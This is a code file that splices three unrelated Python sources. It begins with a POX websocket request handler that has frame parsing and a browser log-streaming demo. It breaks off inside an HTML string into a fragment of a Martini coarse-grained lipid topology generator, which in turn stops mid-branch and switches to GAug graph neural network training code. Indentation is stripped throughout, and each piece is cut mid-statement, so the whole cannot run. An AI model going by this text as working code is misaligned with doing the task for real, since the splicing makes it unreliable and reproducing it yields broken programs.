# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Websocket request handler
The request handler is meant to be subclassed, and it plays nicely with
the cooperative context (you can call send() from the cooperative
context, and the override-friendly handler functions are called within
the cooperative context).
Subclasses are likely interested in overriding the _on_X() methods
(especially _on_message()), and in using the send() and maybe disconnect()
API methods.
There's also a demonstration here which uses a websocket to send logs
to the browser and take a bit of log configuration from the browser.
Launch it with web.websocket:log_service.
"""
import socket
import threading
from pox.core import core
log = core.getLogger()
import base64
import hashlib
import struct
from pox.web.webcore import SplitRequestHandler
from collections import deque
class WebsocketHandler (SplitRequestHandler, object):
"""
Websocket handler class
New messages arriving from the browser are handed to _on_message(), which
you can subclass. This handler is called from the cooperative context.
_on_start() and _on_stop() can be overridden and are called at the
obvious times (hopefully). Again, they're called cooperatively.
You can send messages via send(). This should be called from the
cooperative context.
"""
_websocket_open = False
_initial_send_delay = 0.010
_send_delay = 0
_lock = None
_pending = False
_rx_queue = None
# No longer optional. USE_LOCK = True
READ_TIMEOUT = 5
WS_CONTINUE = 0
WS_TEXT = 1
WS_BINARY = 2
WS_CLOSE = 8
WS_PING = 9
WS_PONG = 10
def log_message (self, format, *args):
log.debug(format, *args)
def _init (self):
self._send_buffer = b''
self._rx_queue = deque()
if True: # No longer optional. self.USE_LOCK:
self._lock = threading.RLock()
def _serve_websocket (self):
self.close_connection = 1
# I think you technically need HTTP/1.1 to be able to upgrade or
# something like that. Firefox and Chrome don't seem to mind if
# we reply with HTTP/1.0, but at least one (Epiphany) will fail.
self.protocol_version = "HTTP/1.1"
log.debug("Upgrading to websocket")
self.send_response(101, "Switching Protocols")
k = self.headers.get("Sec-WebSocket-Key", "")
k += "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
self.send_header("Sec-WebSocket-Accept",
base64.b64encode(hashlib.sha1(k).digest()))
self.send_header("Upgrade", "websocket")
self.send_header("Connection", "Upgrade")
self.end_headers()
# Now stop using wfile and use raw socket
self.wfile.flush()
self.connection.settimeout(0)
self._websocket_open = True
self._queue_call(self._on_start)
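# A quick reference for the framing that the feeder generator below undoes
# (these are facts from the WebSocket protocol, RFC 6455, not new behavior):
# the first header byte holds FIN plus reserved flags in its high nibble and
# the opcode in its low nibble; the second byte holds the MASK bit and a
# 7-bit length, where 126 means a 16-bit extended length follows and 127
# means a 64-bit one; client-to-server frames must be masked, so a 4-byte
# masking key follows the length and the payload is XORed with it.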
def feeder ():
data = b''
old_op = None
while self._websocket_open:
hdr = b''
while len(hdr) < 2:
hdr += yield True
flags_op,len1 = struct.unpack_from("!BB", hdr, 0)
op = flags_op & 0x0f
flags = flags_op >> 4
fin = flags & 0x8
if (len1 & 0x80) == 0: raise RuntimeError("No mask set")
len1 &= 0x7f
hdr = hdr[2:]
while True:
if len1 <= 0x7d:
length = len1
break
elif len1 == 0x7e and len(hdr) >= 2:
length = struct.unpack_from("!H", hdr, 0)[0]
hdr = hdr[2:]
break
elif len1 == 0x7f and len(hdr) >= 8:
length = struct.unpack_from("!Q", hdr, 0)[0]
hdr = hdr[8:]
break
else:
raise RuntimeError("Bad length")
hdr += yield True
while len(hdr) < 4:
hdr += yield True
mask = [ord(x) for x in hdr[:4]]
hdr = hdr[4:]
while len(hdr) < length:
hdr += yield True
d = b"".join(chr(ord(c) ^ mask[i % 4]) for i,c in enumerate(hdr))
if not fin:
if op == self.WS_CONTINUE:
if old_op is None: raise RuntimeError("Continuing unknown opcode")
else:
if old_op is not None: raise RuntimeError("Discarded partial message")
old_op = op
data += d
else: # fin
if op == self.WS_CONTINUE:
if old_op is None: raise RuntimeError("Can't continue unknown frame")
op = old_op
d = data + d
old_op = None
data = b''
if op == self.WS_TEXT: d = d.decode('utf8')
if op in (self.WS_TEXT, self.WS_BINARY):
self._ws_message(op, d)
elif op == self.WS_PING:
msg = self._frame(self.WS_PONG, d)
self._send_real(msg)
elif op == self.WS_CLOSE:
if self.disconnect():
#TODO: Send close frame?
pass
elif op == self.WS_PONG:
pass
else:
pass # Do nothing for unknown type
deframer = feeder()
deframer.send(None)
# This is nutso, but it just might work.
# *Try* to read individual bytes from rfile in case it has some
# buffered. When it fails, switch to reading from connection.
while True:
try:
deframer.send(self.rfile.read(1))
except Exception:
break
import select
while self._websocket_open and core.running:
try:
(rx, tx, xx) = select.select([self.connection], [], [self.connection],
self.READ_TIMEOUT)
except Exception:
# sock died
log.warn("Websocket died")
break
if len(xx):
#TODO: reopen?
log.warn("Websocket exceptional")
break
if len(rx):
try:
r = self.connection.recv(4096)
if not r: break
deframer.send(r)
except Exception as e:
#TODO: reopen
break
log.debug("Done reading websocket")
#NOTE: We should probably send a close frame, but don't.
self.disconnect()
#log.debug("Websocket quit")
def do_GET (self):
# Compatible with AuthMixin
if hasattr(self, '_do_auth') and not self._do_auth(): return
if self.headers.get("Upgrade") == "websocket":
return self._serve_websocket()
else:
self.send_error(405, "Unacceptable request; websockets only")
def _queue_call (self, f):
self._ws_message(None, f) # See note in _ws_message()
def _ws_message (self, opcode, data):
# It's a hack, but this is also used to push arbitrary function calls from
# the WS thread to the cooperative context, by setting opcode as None and
# the function as data.
self._rx_queue.append((opcode,data))
cl = True
if self._lock:
with self._lock:
if self._pending:
cl = False
else:
self._pending = True
if cl: core.call_later(self._ws_message2)
def _ws_message2 (self):
if self._lock:
with self._lock:
assert self._pending
self._pending = False
try:
while True:
op,data = self._rx_queue.popleft()
if op is None: # See note in _ws_message()
try:
data()
except Exception:
log.exception("While calling %s", data)
else:
try:
self._on_message(op, data)
except Exception:
log.exception("While handling message")
except Exception:
pass
@staticmethod
def _frame (opcode, msg):
def encode_len (l):
if l <= 0x7d:
return struct.pack("!B", l)
elif l <= 0xffFF:
return struct.pack("!BH", 0x7e, l)
elif l <= 0x7FFFFFFFFFFFFFFF:
return struct.pack("!BQ", 0x7f, l)
else:
raise RuntimeError("Bad length")
op_flags = 0x80 | (opcode & 0x0F) # 0x80 = FIN
hdr = struct.pack("!B", op_flags) + encode_len(len(msg))
return hdr + msg
def _send_real (self, msg):
if self._send_buffer:
self._send_buffer += msg
return
try:
written = self.connection.send(msg)
if written < len(msg):
# Didn't send all of it.
assert not self._send_buffer
self._send_delay = self._initial_send_delay
self._send_buffer = msg[written:]
core.call_later(self._delayed_send)
except Exception as e:
self.disconnect()
#TODO: reopen?
def _delayed_send (self):
if self._websocket_open is False: return
try:
written = self.connection.send(self._send_buffer)
if written < len(self._send_buffer):
# Didn't send all of it.
self._send_buffer = self._send_buffer[written:]
core.call_later(self._delayed_send)
self._send_delay = min(1, self._send_delay * 2)
else:
self._send_buffer = b''
except Exception:
self.disconnect()
#TODO: reopen?
def __del__ (self):
self.disconnect()
# The following are useful for subclasses...
@property
def is_connected (self):
with self._lock:
return self._websocket_open
def disconnect (self):
if self._lock:
with self._lock:
if self._websocket_open is False:
return False
self._websocket_open = False
elif self._websocket_open is False:
return False
self._websocket_open = False
try:
self._queue_call(self._on_stop)
except Exception:
log.exception("While disconnecting")
try:
self.connection.shutdown(socket.SHUT_RD)
except socket.error as e:
pass
return True
def send (self, msg):
try:
msg = self._frame(self.WS_TEXT, msg.encode())
self._send_real(msg)
except Exception as e:
log.exception("While sending")
self.disconnect()
def _on_message (self, op, msg):
"""
Called when a new message arrives
Override me!
"""
self.log_message("Msg Op:%s Bytes:%s", op, len(msg) if msg else "None")
def _on_start (self):
"""
Called when the Websocket is established
Override me!
"""
self.log_message("Websocket connection started")
def _on_stop (self):
"""
Called when the Websocket connection is lost
Override me!
"""
self.log_message("Websocket connection stopped")
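# A minimal sketch of the subclassing pattern described in the WebsocketHandler
# docstring. EchoHandler is a hypothetical example, not part of POX: it
# overrides _on_message() and replies with send(), both of which run in the
# cooperative context.
class EchoHandler (WebsocketHandler):
  def _on_start (self):
    self.send("connected")
  def _on_message (self, op, msg):
    # Echo text frames back to the browser; ignore everything else
    if op == self.WS_TEXT:
      self.send("echo: " + msg)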
class LogWebsocketHandler (WebsocketHandler):
"""
Sends log messages to a websocket
The browser can also send us JSON objects with logger_name:logger_levels
to control logging levels.
This is mostly meant as an example of WebsocketHandler.
"""
log_handler = None
import logging
class WSLogHandler (logging.Handler):
web_handler = None # Set externally
def emit (self, record):
try:
msg = self.format(record)
self.web_handler.send(msg + "\n")
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def _on_message (self, op, msg):
import json
import logging
msg = json.loads(msg)
for k,v in msg.items():
logging.getLogger(k).setLevel(v)
def _on_start (self):
import logging
self.log_handler = self.WSLogHandler()
self.log_handler.formatter = logging.Formatter("%(levelname)s | %(name)s"
" | %(message)s")
self.log_handler.web_handler = self
logging.getLogger().addHandler(self.log_handler)
log.debug("Websocket logger connected")
def _on_stop (self):
if self.log_handler:
import logging
logging.getLogger().removeHandler(self.log_handler)
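# For reference, a control message for the handler above is just a JSON object
# mapping logger names to logging levels, e.g. (hypothetical values):
#   {"core": "DEBUG", "web.websocket": "INFO"}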
_log_page = """
<!DOCTYPE html>
<html>
<head>
<title>POX Log</title>
<script
- C14:0/C16:0 - MP / C14:0/C18:0 - MS
"CDCC CCCC " - C16:0/C18:1(9c) - PO / C18:0/C18:1(9c) - SO
"CDDC CCCC " - C16:0/C18:2(9c,12c) / C18:0/C18:2(9c,12c)
"DDDDC CCCC " - C16:0/C20:4(5c,8c,11c,14c) - PA / C18:0/C20:4(5c,8c,11c,14c) - SA
"DDDDDD CCCC " - C16:0/C22:6(4c,7c,10c,13c,16c,19c) / C18:0/C22:6(4c,7c,10c,13c,16c,19c)
Trans tails:
"CTCC CTCC " - C18:1(9t) - dielaidoyl
"TCC CCCC " - palmytoyl sphingomyeline tail (AM1 contains the start of the tail)
NOTE: the first tail (tail A) is connected to linker 1 closer to head (this is sn-2 for GLY linker lipids), which is reverse order
compared to how regular lipid names are written. The second tail is tail B (for GLY linker lipids this is sn-1)
Use:
./lipid-martini-itp-v05.py -alhead 'C P' -allink 'G G' -altail "CDCC CCCC" -alname POPC -o POPC-lipid.itp
"""
# Options
options = [
"""
Options:""",
("-o", Option(str, 1, "Martini-lipid.itp", "Output speciffic Martini lipid topology")),
("-alname", Option(str, 1, "POPC", "Four letter lipid name")),
("-alhead", Option(str, 1, "C P", "Lipid heads, see description")),
("-allink", Option(str, 1, "G G", "Lipid linkers, see description")),
("-altail", Option(str, 1, "CDCC CCCC", "Lipid tails, see description")),
("-name", Option(str, 1, "POPC", "A common name of the lipid, only use in comments")),
("-desc", Option(str, 1, "This is a ...", "A general description of what the FF is / represents, only use in comments")),
("-keyw", Option(str, 1, "", "List of keywords, only use in comments")),
("-parm", Option(str, 1, "Was modeled on ...", "Fow the FF was parameterized, only use in comments")),
("-refs", Option(str, 1, "", "List of references for the FF, only use in comments")),
("-crea", Option(str, 1, "", "FF created on, only use in comments")),
("-auth", Option(str, 1, "", "FF author, only use in comments")),
("-modi", Option(str, 1, "", "List of modifications to the FF, only use in comments")),
("-area", Option(str, 1, "", "Reference area per lipid, only use in comments")),
("-warn", Option(str, 1, "", "Warning(s)/Note(s) for the FF, only use in comments"))
]
# Define supported lipid head beads
# Lists all supported head bead types. One letter name mapped to type, atom name and charge
headMapp = {
"C": ['Q0', 'NC3', '1.0'], # NC3 = Choline
"E": ['Qd', 'NH3', '1.0'], # NH3 = Ethanolamine
"G": ['P4', 'GL0', '0.0'], # GL0 = Glycerol
"S": ['P5', 'CNO', '0.0'], # CNO = Serine
"P": ['Qa', 'PO4', '-1.0'], # PO4 = Phosphate
"O": ['Qa', 'PO4', '-2.0'] # PO4 = Phosphate (one bond x2 charges can be used e.g. when making unprotonated PA lipids)
}
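# Worked example (illustrative only, not used by the script below): the head
# string "C P" from the usage example above expands via headMapp into a
# choline bead and a phosphate bead, i.e. a standard PC head group.
exampleHeadBeads = [headMapp[b] for b in "C P".split()]
# exampleHeadBeads == [['Q0', 'NC3', '1.0'], ['Qa', 'PO4', '-1.0']]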
# Define possible bond lengths and forces
defBlength = '0.47'
defShortBlength = '0.37'
defBforce = '1250'
# Define possible angles and forces
defAngle1 = '100.0'
defAngle2 = '120.0'
defAngle3 = '180.0'
defAforce1 = '10.0'
defAforce2 = '25.0'
defAforce3 = '45.0'
# Get arguments
args = sys.argv[1:]
# Print help
if '-h' in args or '--help' in args:
print "\n",__file__
print desc
for thing in options:
print type(thing) != str and "%10s %s"%(thing[0],thing[1].description) or thing
print
sys.exit()
# Convert the option list to a dictionary, discarding all comments
options = dict([i for i in options if not type(i) == str])
# Process the command line
while args:
ar = args.pop(0)
options[ar].setvalue([args.pop(0) for i in range(options[ar].num)])
# Get output .itp file name
itpFileName = options["-o"].value
# Get lipid description
lipidHead = options["-alhead"].value
lipidLinker = options["-allink"].value
lipidTail = options["-altail"].value
if lipidHead==None or lipidLinker==None or lipidTail==None:
print >>sys.stderr, "You have to provide a header, linker and tail lipid description, if one should be missing provide an empty string"
sys.exit()
lipidName = options["-alname"].value
lipidCommonName = options["-name"].value
lipidDesc = options["-desc"].value
lipidParm = options["-parm"].value
if lipidCommonName==None or lipidDesc==None or lipidParm==None:
print >>sys.stderr, "You have to provide a common name, description and list how the FF was parameterized."
sys.exit()
lCharge = 0 # Update when adding charged beads
progString = "The Martini lipid itp generator version " + __version__ + " Args are: -o %s -alname %s -alhead '%s' -allink '%s' -altail '%s'" % (itpFileName, lipidName, lipidHead, lipidLinker, lipidTail)
print progString
headsArray = lipidHead.split()
linkersArray = lipidLinker.split()
linkersIndex = []
tailsArray = lipidTail.split()
if len(tailsArray)>len(linkersArray):
print >>sys.stderr, "A linker definition has to be provided for each tail"
sys.exit()
bondsArray = []
anglesArray = []
beadArray = []
dihedralsArray = []
constraintsArray = []
exclusionsArray = []
# If special head, insert now all beads, bonds, angles, dihedrals, constraints etc
index = 1
if len(headsArray)>0 and headsArray[0]=='PI': # Add PI head
# This is from the head of Cesar's DPPI parameters (in the glycolipids.itp)
# Modified: - bead 4 CP name changed to PO4 - HII
# Modified: - switch on / off constraints - <NAME>
beadArray.append([1, 'P1', 1, lipidName, 'C1 ', 1, 0, ''])
beadArray.append([2, 'P4', 1, lipidName, 'C2 ', 2, 0, ''])
beadArray.append([3, 'P4', 1, lipidName, 'C3 ', 3, 0, ''])
beadArray.append([4, 'Qa', 1, lipidName, 'PO4', 4, -1.0, '; Name changed from CP to PO4'])
index += 4
lCharge += -1.0 # Keep track of overall lipid charge
beadArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
bondsArray.append([-2, '#ifdef FLEXIBLE'])
bondsArray.append([-1, 'Using bonds not constraints'])
bondsArray.append([1, 2, '0.40', '30000', ''])
bondsArray.append([1, 3, '0.40', '30000', ''])
bondsArray.append([2, 3, '0.40', '30000', ''])
bondsArray.append([-2, '#endif'])
bondsArray.append([1, 4, 0.35, defBforce, ''])
bondsArray.append([4, 5, defBlength, defBforce, '']) # This links the head to the linker
bondsArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
anglesArray.append([3, 1, 4, '133.0', '100.0', ''])
anglesArray.append([2, 1, 4, '100.0', '70.0', ''])
anglesArray.append([-1, 'Orient Head'])
anglesArray.append([1, 4, 5, '140.0', '30.0', '; link to lipid'])
anglesArray.append([-1, '4 5 6 2 120.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, '4 5 7 2 180.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
dihedralsArray.append([-1, '3 1 4 5 1 -30.0 5.0 1 ; Removed as it was unstable - WARNING has not been tested'])
constraintsArray.append([-2, '#ifndef FLEXIBLE'])
constraintsArray.append([-1, 'Using constraints not bonds'])
constraintsArray.append([1, 2, '0.40', ''])
constraintsArray.append([1, 3, '0.40', ''])
constraintsArray.append([2, 3, '0.40', ''])
constraintsArray.append([-2, '#endif'])
elif len(headsArray)>0 and headsArray[0]=='P1': # Add PIP_1 head
# This is from the head of Cesar's PIP PI3 parameters (in the glycolipids.itp)
# Modified: - bead 4 CP name changed to PO4 - Helgi
# Modified: - bead 2 type changed from Na to P1, oct 2013 - <NAME>
# Modified: - switch on / off constraints - <NAME>
beadArray.append([1, 'P1', 1, lipidName, 'C1 ', 1, 0, ''])
beadArray.append([2, 'P1', 1, lipidName, 'C2 ', 2, 0, '; corrected particle type (P1 instead of Na), oct 2013'])
beadArray.append([3, 'P4', 1, lipidName, 'C3 ', 3, 0, ''])
beadArray.append([4, 'Qa', 1, lipidName, 'PO4', 4, -1.0, '; Name changed from CP to PO4'])
beadArray.append([5, 'Qa', 1, lipidName, 'P1 ', 5, -2.0, ''])
index += 5
lCharge += -3.0 # Keep track of overall lipid charge
beadArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
bondsArray.append([-2, '#ifdef FLEXIBLE'])
bondsArray.append([-1, 'Using bonds not constraints'])
bondsArray.append([1, 2, '0.40', '30000', ''])
bondsArray.append([1, 3, '0.40', '30000', ''])
bondsArray.append([2, 3, '0.40', '30000', ''])
bondsArray.append([1, 5, '0.40', '25000', ''])
bondsArray.append([2, 5, '0.30', '30000', ''])
bondsArray.append([-2, '#endif'])
bondsArray.append([1, 4, '0.35', defBforce, ''])
bondsArray.append([4, 6, defBlength, defBforce, '']) # This links the head to the linker
bondsArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
anglesArray.append([-1, 'Here we have less angles than in PI, replaced by bonds/constraints'])
anglesArray.append([-1, 'Orient Head'])
anglesArray.append([1, 4, 6, '140.0', '25.0', '; link to lipid - PI has 30'])
anglesArray.append([-1, '4 6 7 2 120.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, '4 6 8 2 180.00 25.0 ; These are part of the default lipids rules but not used here'])
anglesArray.append([-1, 'Tail part (uses standar Martini v2.0 tail rules)'])
dihedralsArray.append([-1, '3 1 4 6 1 -30.0 5.0 1 ; Removed as it was unstable - WARNING has not been tested'])
constraintsArray.append([-2, '#ifndef FLEXIBLE'])
constraintsArray.append([-1, 'Using constraints not bonds'])
constraintsArray.append([1, 2, '0.40', ''])
constraintsArray.append([1, 3, '0.40', ''])
constraintsArray.append([2, 3, '0.40', ''])
constraintsArray.append([1, 5, '0.40', ''])
constraintsArray.append([2, 5, '0.30', ''])
constraintsArray.append([-2, '#endif'])
elif len(headsArray)>0 and headsArray[0]=='P2': # Add PIP_2 head
# This is from the head of Cesar's PIP2(3,4) parameters (in the glycolipids.itp)
# Modified:
import gc
import math
import logging
import numpy as np
import scipy.sparse as sp
import torch
import torch.nn as nn
import torch.nn.functional as F
import pyro
from itertools import combinations
from sklearn.metrics import roc_auc_score, average_precision_score
import pickle
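# The class below calls two helpers that are not defined in this excerpt:
# scipysp_to_pytorchsp() and MultipleOptimizer. The sketches here are
# reconstructed only from how they are used below; the original project may
# implement them differently.
def scipysp_to_pytorchsp(sp_mx):
    """ assumed behavior: convert a scipy sparse matrix to a torch sparse FloatTensor """
    if not sp.isspmatrix_coo(sp_mx):
        sp_mx = sp_mx.tocoo()
    indices = torch.LongTensor(np.vstack((sp_mx.row, sp_mx.col)))
    values = torch.FloatTensor(sp_mx.data)
    return torch.sparse.FloatTensor(indices, values, torch.Size(sp_mx.shape))

class MultipleOptimizer(object):
    """ assumed behavior: wrap several optimizers behind one zero_grad/step interface """
    def __init__(self, *optimizers):
        self.optimizers = optimizers
    def zero_grad(self):
        for opt in self.optimizers:
            opt.zero_grad()
    def step(self):
        for opt in self.optimizers:
            opt.step()
    def update_lr(self, op_index, new_lr):
        # set the learning rate of one wrapped optimizer, as used in fit()
        for param_group in self.optimizers[op_index].param_groups:
            param_group['lr'] = new_lr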
class GAug(object):
def __init__(self, adj_matrix, features, labels, tvt_nids, cuda=-1, hidden_size=128, emb_size=64, n_layers=2, epochs=200, seed=-1, lr=1e-2, weight_decay=5e-4, dropout=0.5, gae=False, beta=0.5, temperature=0.2, log=True, name='debug', warmup=3, gnnlayer_type='gcn', jknet=False, alpha=1, sample_type='add_sample', feat_norm='no', batch_size=15000):
self.lr = lr
self.weight_decay = weight_decay
self.n_epochs = epochs
self.gae = gae
self.beta = beta
self.warmup = warmup
self.feat_norm = feat_norm
self.batch_size = batch_size
# create a logger, logs are saved to GAug-[name].log when name is not None
if log:
self.logger = self.get_logger(name)
else:
# disable logger if wanted
# logging.disable(logging.CRITICAL)
self.logger = logging.getLogger()
# config device (force device to cpu when cuda is not available)
if not torch.cuda.is_available():
cuda = -1
self.device = torch.device(f'cuda:{cuda}' if cuda>=0 else 'cpu')
# log all parameters to keep record
all_vars = locals()
self.log_parameters(all_vars)
# fix random seeds if needed
if seed > 0:
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# load data
self.load_data(adj_matrix, features, labels, tvt_nids, gnnlayer_type)
# setup the model
self.model = GAug_model(self.features.size(1),
hidden_size,
emb_size,
self.out_size,
n_layers,
F.relu,
dropout,
self.device,
gnnlayer_type,
temperature=temperature,
gae=gae,
jknet=jknet,
alpha=alpha,
sample_type=sample_type)
def load_data(self, adj_matrix, features, labels, tvt_nids, gnnlayer_type):
""" preprocess data """
# features (torch.FloatTensor)
if isinstance(features, torch.FloatTensor):
self.features = features
else:
self.features = torch.FloatTensor(features)
# normalize feature matrix if needed
if self.feat_norm == 'row':
self.features = F.normalize(self.features, p=1, dim=1)
elif self.feat_norm == 'col':
self.features = self.col_normalization(self.features)
else:
pass
# original adj_matrix for training vgae (torch.FloatTensor)
assert sp.issparse(adj_matrix)
if not isinstance(adj_matrix, sp.coo_matrix):
adj_matrix = sp.coo_matrix(adj_matrix)
adj_matrix.setdiag(1)
self.adj_orig = sp.csr_matrix(adj_matrix)
# normalized adj_matrix used as input for ep_net (torch.sparse.FloatTensor)
degrees = np.array(adj_matrix.sum(1))
degree_mat_inv_sqrt = sp.diags(np.power(degrees, -0.5).flatten())
adj_norm = degree_mat_inv_sqrt @ adj_matrix @ degree_mat_inv_sqrt
self.adj_norm = scipysp_to_pytorchsp(adj_norm)
# adj_matrix used as input for nc_net (torch.sparse.FloatTensor)
if gnnlayer_type == 'gcn':
self.adj = scipysp_to_pytorchsp(adj_norm)
elif gnnlayer_type == 'gsage':
adj_matrix_noselfloop = sp.coo_matrix(adj_matrix)
# adj_matrix_noselfloop.setdiag(0)
# adj_matrix_noselfloop.eliminate_zeros()
adj_matrix_noselfloop = sp.coo_matrix(adj_matrix_noselfloop / adj_matrix_noselfloop.sum(1))
self.adj = scipysp_to_pytorchsp(adj_matrix_noselfloop)
elif gnnlayer_type == 'gat':
# self.adj = scipysp_to_pytorchsp(adj_matrix)
self.adj = torch.FloatTensor(adj_matrix.todense())
# labels (torch.LongTensor) and train/validation/test nids (np.ndarray)
if len(labels.shape) == 2:
labels = torch.FloatTensor(labels)
else:
labels = torch.LongTensor(labels)
self.labels = labels
self.train_nid = tvt_nids[0]
self.val_nid = tvt_nids[1]
self.test_nid = tvt_nids[2]
# number of classes
if len(self.labels.size()) == 1:
self.out_size = len(torch.unique(self.labels))
else:
self.out_size = labels.size(1)
def extend_batch(self, seed_batch, hops):
nodes_batch = seed_batch
for _ in range(hops):
neigh_block = self.adj_orig[nodes_batch]
nodes_batch = neigh_block.sum(0).nonzero()[1]
nodes_batch = np.setdiff1d(nodes_batch, seed_batch, assume_unique=True)
nodes_batch = np.concatenate((seed_batch, nodes_batch))
return nodes_batch
def pretrain_ep_net(self, model, adj, features, adj_orig, norm_w, pos_weight, n_epochs):
""" pretrain the edge prediction network """
optimizer = torch.optim.Adam(model.ep_net.parameters(),
lr=self.lr/5)
batch_size = int(self.batch_size * 1.5)
n_batch = int(len(self.labels) / batch_size)
model.train()
for epoch in range(n_epochs):
node_idx_all = np.arange(len(self.labels))
np.random.shuffle(node_idx_all)
seed_batchs = np.array_split(node_idx_all, n_batch)
visited_nodes = set()
for batch, seed_batch in enumerate(seed_batchs):
nodes_batch = seed_batch
visited_nodes |= set(nodes_batch)
adj_orig = torch.FloatTensor(self.adj_orig[nodes_batch][:,nodes_batch].toarray()).to(self.device)
adj_logits = model.ep_net(adj, features, nodes_batch)
loss = norm_w * F.binary_cross_entropy_with_logits(adj_logits, adj_orig, pos_weight=pos_weight)
if not self.gae:
mu = model.ep_net.mean
lgstd = model.ep_net.logstd
kl_divergence = 0.5/adj_logits.size(0) * (1 + 2*lgstd - mu**2 - torch.exp(2*lgstd)).sum(1).mean()
loss -= kl_divergence
optimizer.zero_grad()
loss.backward()
optimizer.step()
self.logger.info('EPNet pretrain, Epoch [{:3}/{}] Batch[{:2}/{}]: loss {:.4f} Processed Nodes [{}/{}]'
.format(epoch+1, n_epochs, batch+1, n_batch, loss.item(),len(visited_nodes), len(node_idx_all)))
if len(visited_nodes) >= len(node_idx_all):
break
del adj_orig, adj_logits
torch.cuda.empty_cache()
gc.collect()
def pretrain_nc_net(self, model, adj, features, labels, n_epochs):
""" pretrain the node classification network """
optimizer = torch.optim.Adam(model.nc_net.parameters(),
lr=self.lr,
weight_decay=self.weight_decay)
# loss function for node classification
if len(self.labels.size()) == 2:
nc_criterion = nn.BCEWithLogitsLoss()
else:
nc_criterion = nn.CrossEntropyLoss()
best_val_acc = 0.
for epoch in range(n_epochs):
model.train()
nc_logits = model.nc_net(adj, features)
# losses
loss = nc_criterion(nc_logits[self.train_nid], labels[self.train_nid])
optimizer.zero_grad()
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
nc_logits_eval = model.nc_net(adj, features)
val_acc = self.eval_node_cls(nc_logits_eval[self.val_nid], labels[self.val_nid])
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = self.eval_node_cls(nc_logits_eval[self.test_nid], labels[self.test_nid])
self.logger.info('NCNet pretrain, Epoch [{:2}/{}]: loss {:.4f}, val acc {:.4f}, test acc {:.4f}'
.format(epoch+1, n_epochs, loss.item(), val_acc, test_acc))
else:
self.logger.info('NCNet pretrain, Epoch [{:2}/{}]: loss {:.4f}, val acc {:.4f}'
.format(epoch+1, n_epochs, loss.item(), val_acc))
def fit(self, pretrain_ep=200, pretrain_nc=20):
""" train the model """
# move data to device
adj_norm = self.adj_norm.to(self.device)
adj = self.adj.to(self.device)
features = self.features.to(self.device)
labels = self.labels.to(self.device)
adj_orig = self.adj_orig
model = self.model.to(self.device)
# weights for log_lik loss when training EP net
adj_t = self.adj_orig
norm_w = adj_t.shape[0]**2 / float((adj_t.shape[0]**2 - adj_t.sum()) * 2)
pos_weight = torch.FloatTensor([float(adj_t.shape[0]**2 - adj_t.sum()) / adj_t.sum()]).to(self.device)
# pretrain VGAE if needed
if pretrain_ep:
self.pretrain_ep_net(model, adj_norm, features, adj_orig, norm_w, pos_weight, pretrain_ep)
# pretrain GCN if needed
if pretrain_nc:
self.pretrain_nc_net(model, adj, features, labels, pretrain_nc)
# optimizers
optims = MultipleOptimizer(torch.optim.Adam(model.ep_net.parameters(),
lr=self.lr/10),
torch.optim.Adam(model.nc_net.parameters(),
lr=self.lr/10,
weight_decay=self.weight_decay))
# get the learning rate schedule for the optimizer of ep_net if needed
if self.warmup:
ep_lr_schedule = self.get_lr_schedule_by_sigmoid(self.n_epochs, self.lr, self.warmup)
ep_lr_schedule /= 10
# loss function for node classification
if len(self.labels.size()) == 2:
nc_criterion = nn.BCEWithLogitsLoss()
else:
nc_criterion = nn.CrossEntropyLoss()
# keep record of the best validation accuracy for early stopping
best_val_acc = 0.
patience_step = 0
batch_size = int(self.batch_size / 60)
n_batch = int(len(self.train_nid) / batch_size)
# train model
for epoch in range(self.n_epochs):
# update the learning rate for ep_net if needed
if self.warmup:
optims.update_lr(0, ep_lr_schedule[epoch])
node_idx_all = np.array(self.train_nid)
np.random.shuffle(node_idx_all)
seed_batchs = np.array_split(node_idx_all, n_batch)
visited_nodes = set()
for batch, seed_batch in enumerate(seed_batchs):
nodes_batch = self.extend_batch(seed_batch, 2)
if len(nodes_batch) >= self.batch_size:
nodes_batch = nodes_batch[:self.batch_size]
visited_nodes |= set(nodes_batch)
adj_orig = torch.FloatTensor(self.adj_orig[nodes_batch][:,nodes_batch].toarray()).to(self.device)
model.train()
nc_logits, adj_logits = model(adj_norm, adj_orig, features, nodes_batch)
# losses
loss = nc_loss = nc_criterion(nc_logits[:len(seed_batch)], labels[seed_batch])
ep_loss = norm_w * F.binary_cross_entropy_with_logits(adj_logits, adj_orig, pos_weight=pos_weight)
loss += self.beta * ep_loss
optims.zero_grad()
loss.backward()
optims.step()
# validate (without dropout)
model.eval()
with torch.no_grad():
nc_logits_eval = model.nc_net(adj, features)
val_acc = self.eval_node_cls(nc_logits_eval[self.val_nid], labels[self.val_nid])
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = self.eval_node_cls(nc_logits_eval[self.test_nid], labels[self.test_nid])
self.logger.info('Epoch [{:3}/{}] Batch[{:2}/{}]: ep loss {:.4f}, nc loss {:.4f}, val acc {:.4f}, test acc {:.4f}'
.format(epoch+1, self.n_epochs, batch+1, n_batch, ep_loss.item(), nc_loss.item(), val_acc, test_acc))
patience_step = 0
else:
self.logger.info('Epoch [{:3}/{}] Batch[{:2}/{}]: ep loss {:.4f}, nc loss {:.4f}, val acc {:.4f}'
.format(epoch+1, self.n_epochs, batch+1, n_batch, ep_loss.item(), nc_loss.item(), val_acc))
patience_step += 1
if patience_step == 150:
self.logger.info('Early stop!')
return test_acc
del adj_orig, adj_logits, nc_logits, nc_logits_eval
